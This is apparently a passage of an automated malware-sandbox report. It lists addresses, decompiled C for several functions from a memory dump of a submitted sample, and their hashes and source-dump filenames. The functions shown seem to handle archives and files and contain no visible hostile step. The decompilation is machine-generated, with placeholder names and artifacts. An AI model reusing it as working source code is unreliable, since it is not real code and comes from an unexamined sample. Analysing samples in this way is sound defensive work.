0x00ba3ccf
0x00ba3cd5
0x00ba3cdd
0x00ba3ce3
0x00ba3cef
0x00ba3cfb
0x00ba3cfe
0x00ba3d01
0x00ba3d07
0x00ba3d0d
0x00ba3d13
0x00ba3d19
0x00ba3d1f
0x00ba3d25
0x00ba3d3e
0x00ba3d27
0x00ba3d27
0x00ba3d28
0x00ba3d29
0x00ba3d2a
0x00ba3d2a
0x00ba3d58
0x00ba3d5a
0x00ba3d69
0x00ba3d6b
0x00ba3d98
0x00ba3d6d
0x00ba3d7a
0x00ba3d86
0x00ba3d8b
0x00ba3d8d
0x00ba3d91
0x00ba3d91
0x00ba3d8d
0x00ba3d9a
0x00ba3da0
0x00ba3da6
0x00000000
0x00ba3da8
0x00ba3c40
0x00ba3c46
0x00ba3c4c
0x00000000
0x00000000
0x00ba3c75
0x00ba3c7e
0x00ba3c7e
0x00ba3c95
0x00000000
0x00ba3c95
0x00ba3be5
0x00ba3beb
0x00ba3c0b
0x00ba3c0b
0x00ba3c0d
0x00ba3c20
0x00ba3c33
0x00ba3c0f
0x00ba3c0f
0x00ba3c0f
0x00000000
0x00ba3c0d
0x00ba3bed
0x00ba3bfb
0x00ba3c01
0x00000000
0x00ba3c01
0x00ba3bef
0x00ba3bf9
0x00000000
0x00000000
0x00000000
0x00ba3bf9
0x00ba3b9c
0x00ba3ba2
0x00000000
0x00ba3ba4
0x00ba3ba4
0x00000000
0x00ba3ba4
0x00ba3b46
0x00ba3b4c
0x00ba3b58
0x00ba3db6
0x00ba3db6
0x00ba3db8
0x00ba3dbc
0x00ba3dc6
0x00ba3dc6

APIs

__EH_prolog.LIBCMT ref: 00BA3B2B

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: de7f986468a8fa03639c28dd493954cd7925c1a821fed2ffeb3b4352e4f992b7
Instruction ID: e89db78f6cda4f23d59eeff1b93a4461bc6f8dd0a504ec43f7462f4995dea98a
Opcode Fuzzy Hash: de7f986468a8fa03639c28dd493954cd7925c1a821fed2ffeb3b4352e4f992b7
Instruction Fuzzy Hash: 89718D71408B44AEDB21DF34CC95AEBB7E8EB16701F4449AEF5AA87242D6316A48CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8329 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00BA8329(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				void* _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E00BBE0E4(E00BD1C6A, _t95);
				E00BBE1C0();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E00BA13B1(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E00BA9E37(_t6, __edi, _t93, _t93 + 0xf4) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E00BA19D6(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d3a; // -38202
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E00BAFD96(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E00BABA04(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E00BA7098(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E00BAA406(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E00BA84C1(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x61f9)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x61f9));
								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
								E00BB12B5((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E00BA1F30(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E00BA3A95(_t34, _t89, _t93);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E00BA8525(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E00BA6F5B(0xbdff50, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E00BA1662(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}

0x00ba8329
0x00ba8329
0x00ba8329
0x00ba8329
0x00ba832e
0x00ba8338
0x00ba833e
0x00ba8340
0x00ba8349
0x00ba834e
0x00ba8359
0x00ba8366
0x00ba836e
0x00ba8374
0x00ba837b
0x00ba838e
0x00ba8395
0x00ba839c
0x00ba839f
0x00ba83a1
0x00ba83a7
0x00ba83ae
0x00ba83b5
0x00ba83bc
0x00ba83c1
0x00ba83dc
0x00ba83e8
0x00ba83ef
0x00ba83f4
0x00ba83fa
0x00ba83ff
0x00ba8401
0x00ba8408
0x00ba840f
0x00ba8414
0x00ba8416
0x00000000
0x00000000
0x00ba83c9
0x00ba83cf
0x00ba83d5
0x00ba83d5
0x00ba8418
0x00ba841e
0x00ba841e
0x00ba8424
0x00ba842d
0x00ba8432
0x00ba8437
0x00ba8438
0x00ba8439
0x00ba8441
0x00ba8444
0x00ba844b
0x00ba844b
0x00ba8446
0x00ba8446
0x00ba8449
0x00000000
0x00000000
0x00ba8449
0x00ba8452
0x00ba8455
0x00ba845c
0x00ba845e
0x00ba846c
0x00ba846c
0x00ba8473
0x00ba8473
0x00ba8478
0x00ba847e
0x00ba8483
0x00ba8483
0x00ba8489
0x00ba848e
0x00ba8493
0x00ba849c
0x00ba84a1
0x00ba84a1
0x00ba8483
0x00ba837d
0x00ba8384
0x00ba8384
0x00ba837b
0x00ba84a5
0x00ba84ab
0x00ba84b6
0x00ba84c0

APIs

__EH_prolog.LIBCMT ref: 00BA832E

Part of subcall function 00BA13B1: __EH_prolog.LIBCMT ref: 00BA13B6
Part of subcall function 00BA13B1: new.LIBCMT ref: 00BA142F

Part of subcall function 00BA19D6: __EH_prolog.LIBCMT ref: 00BA19DB

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a42f0322df3ed3e22b4692a34f8120d4d749e48b3f3a0e1aff6e410bae5afd92
Instruction ID: 805371bc61f2406f9a1ba09289c438ed8a7e885a8ce2176b1bf327461883c2d1
Opcode Fuzzy Hash: a42f0322df3ed3e22b4692a34f8120d4d749e48b3f3a0e1aff6e410bae5afd92
Instruction Fuzzy Hash: CA41D2718086599ADF24EB60CC55BEAB3F8EF06300F0444EAE58A97553DF745EC8DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2DDD Relevance: 1.6, APIs: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00BB2DDD(void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				void* _t29;
				signed int _t30;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t56 = __edx;
				_t48 = __ecx;
				_t29 = E00BBE0E4(E00BD1E1E, _t67);
				_push(_t48);
				_push(_t48);
				_t60 = _t48;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(_t60 + 0x20));
				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E00BBE383(_t48, _t56, 0x400400, _t72); // executed
					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
					_t29 = E00BBF1A0(_t60, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_t58 = _t30 * 0x4ae4 >> 0x20;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004);
					_t36 = E00BBE383(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73);
					_pop(0xbdff50);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E00BB1AF0);
						_push(E00BB1910);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E00BBE1ED(_t58, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E00BBF1A0(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00BC3413(0xbdff50); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0xbdff50 = 0x30c00;
								if(_t39 == 0) {
									E00BA6E92(0xbdff50);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}

0x00bb2ddd
0x00bb2ddd
0x00bb2de2
0x00bb2de7
0x00bb2de8
0x00bb2dec
0x00bb2dee
0x00bb2df0
0x00bb2df3
0x00bb2dfa
0x00bb2dfb
0x00bb2e03
0x00bb2e06
0x00bb2e0b
0x00bb2e0b
0x00bb2e0e
0x00bb2e11
0x00bb2e1c
0x00bb2e23
0x00bb2e25
0x00bb2e28
0x00bb2e3d
0x00bb2e3e
0x00bb2e43
0x00bb2e44
0x00bb2e47
0x00bb2e4a
0x00bb2e4c
0x00bb2e4e
0x00bb2e53
0x00bb2e58
0x00bb2e59
0x00bb2e59
0x00bb2e5c
0x00bb2e5e
0x00bb2e63
0x00bb2e64
0x00bb2e64
0x00bb2e69
0x00bb2e73
0x00bb2e7a
0x00bb2e84
0x00bb2e86
0x00bb2e88
0x00bb2e8b
0x00bb2e8e
0x00bb2e97
0x00bb2e9e
0x00bb2ea8
0x00bb2ead
0x00bb2eb3
0x00bb2eb6
0x00bb2ebd
0x00bb2ebd
0x00bb2ec2
0x00bb2ec2
0x00bb2ec5
0x00bb2eca
0x00bb2ecd
0x00bb2ecd
0x00bb2e8b
0x00bb2e84
0x00bb2ed8
0x00bb2ee2

APIs

__EH_prolog.LIBCMT ref: 00BB2DE2

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 882636fba2cfbf8ee5e1420507450cb1b17dfc96c73019605a00a54ad0050c50
Instruction ID: edb2dc4bf46c7ad3a0b9ed603a9c3287046097716718a352824f2e2b96880639
Opcode Fuzzy Hash: 882636fba2cfbf8ee5e1420507450cb1b17dfc96c73019605a00a54ad0050c50
Instruction Fuzzy Hash: 9B21D5B1E40216ABDB14DF79CC426BAB6E8EF04314F0405BAE519EB681D7B0D910C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1E30 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00BA1E30(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E00BBE0E4(E00BD1B0B, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E00BA3B26(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E00BA1702(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E00BA1879(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E00BB12D6( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E00BB1351( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E00BB138C();
					}
					E00BA1879(_t68, E00BC33F3( *_t68));
					_t49 = 1;
				}
				E00BA15D1(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}

0x00ba1e30
0x00ba1e30
0x00ba1e35
0x00ba1e3e
0x00ba1e42
0x00ba1e45
0x00ba1e48
0x00ba1e4b
0x00ba1e4e
0x00ba1e51
0x00ba1e59
0x00ba1e5f
0x00ba1e66
0x00ba1e6e
0x00ba1e76
0x00ba1e81
0x00ba1e84
0x00ba1e88
0x00ba1e8e
0x00ba1e93
0x00ba1e9d
0x00ba1eb5
0x00ba1ed6
0x00ba1eb7
0x00ba1eb7
0x00ba1ebf
0x00ba1ec8
0x00ba1ec8
0x00ba1e9f
0x00ba1e9f
0x00ba1ea2
0x00ba1ea4
0x00ba1ea7
0x00ba1ea7
0x00ba1ee6
0x00ba1eec
0x00ba1eee
0x00ba1ef2
0x00ba1efd
0x00ba1f07

APIs

__EH_prolog.LIBCMT ref: 00BA1E35

Part of subcall function 00BA3B26: __EH_prolog.LIBCMT ref: 00BA3B2B

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3787bd1175a66383e50612e7aaa6da82f7537fd4e21488eb1eb15d091e4cbc69
Instruction ID: c2c186ba67e04e6c73d29c5f61c10096161cfc4ed48fffd05054646c776ce1ce
Opcode Fuzzy Hash: 3787bd1175a66383e50612e7aaa6da82f7537fd4e21488eb1eb15d091e4cbc69
Instruction Fuzzy Hash: 09213972908108AFCB51DF99C9919EEFBF6FF59300F5008AAE845A7251DB325E10CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA712 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00BBA712(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E00BBE0E4(E00BD1E69, _t62);
				_push(_t47);
				E00BBE1C0();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E00BA13B1(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E00BA1F7F(_t62 - 0x7d24, _t57, _t60, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_push(_t62 - 0x24);
					_t50 = _t62 - 0x7d24;
					_t33 = E00BA1981(_t62 - 0x7d24, _t57);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E00BC3413(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E00BBF300(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E00BA1618(_t62 - 0x24);
					E00BA1662(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E00BA1662(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}

0x00bba712
0x00bba712
0x00bba712
0x00bba717
0x00bba71c
0x00bba722
0x00bba728
0x00bba729
0x00bba72c
0x00bba736
0x00bba739
0x00bba747
0x00bba74b
0x00bba756
0x00bba767
0x00bba76a
0x00bba76d
0x00bba770
0x00bba773
0x00bba779
0x00bba77d
0x00bba77e
0x00bba784
0x00bba789
0x00bba78b
0x00bba78d
0x00bba790
0x00bba796
0x00bba79d
0x00bba7a2
0x00bba7a4
0x00bba7a6
0x00bba7ac
0x00bba7af
0x00bba7b7
0x00bba7a8
0x00bba7a8
0x00bba7a8
0x00bba7c2
0x00bba7c2
0x00bba7c7
0x00bba7d2
0x00bba7d7
0x00bba758
0x00bba75e
0x00bba763
0x00bba763
0x00bba7de
0x00bba7e9

APIs

__EH_prolog.LIBCMT ref: 00BBA717

Part of subcall function 00BA13B1: __EH_prolog.LIBCMT ref: 00BA13B6
Part of subcall function 00BA13B1: new.LIBCMT ref: 00BA142F

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b0add0f6d12400da3c45433b824317fde7eefa68cf8053119da11caa61bd2b52
Instruction ID: 06456c3e76d349e10ee3cd81a1d3f25474086439f23e3b1dcba481ce70389663
Opcode Fuzzy Hash: b0add0f6d12400da3c45433b824317fde7eefa68cf8053119da11caa61bd2b52
Instruction Fuzzy Hash: F4215771C08249AFCF15DF99C9919EEB7F8AF19300F5008EEE809A7202DB756E05CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9283 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00BA9283(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E00BBE0E4(E00BD1D77, _t42);
				E00BA7076(_t42 - 0x20, E00BA7D9F());
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E00BAC9AC( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E00BACB91( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_t40 = E00BAC9AC( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
					} while (_t40 > 0);
				}
				_t21 = E00BA15D1(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}

0x00ba9283
0x00ba9288
0x00ba929a
0x00ba92a8
0x00ba92b1
0x00ba92b5
0x00ba92b8
0x00ba92bc
0x00ba92bf
0x00ba92bf
0x00ba92c1
0x00ba92c2
0x00ba92c4
0x00ba92cc
0x00ba92cc
0x00ba92d0
0x00ba92d9
0x00ba92e0
0x00ba92e1
0x00ba92e3
0x00ba92e3
0x00ba92f3
0x00ba92f5
0x00ba92fa
0x00ba92fe
0x00ba9307
0x00ba9311

APIs

__EH_prolog.LIBCMT ref: 00BA9288

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5e1ab1b8c7f718e2a484b5b32ca8075d28c840440f79afdde53d02bb2df635a7
Instruction ID: 9145d95dac809b9f0f2c2357742d8e425b5f3a0cf9012ed3afaa3a16f830b8fa
Opcode Fuzzy Hash: 5e1ab1b8c7f718e2a484b5b32ca8075d28c840440f79afdde53d02bb2df635a7
Instruction Fuzzy Hash: D111A973D08528A7CF22AFA8CC51AEDB7B1FF85700F0445A5FC1567211CE318C1096A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BBCF72 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00BBCF72(void* __ecx, void* __eflags) {
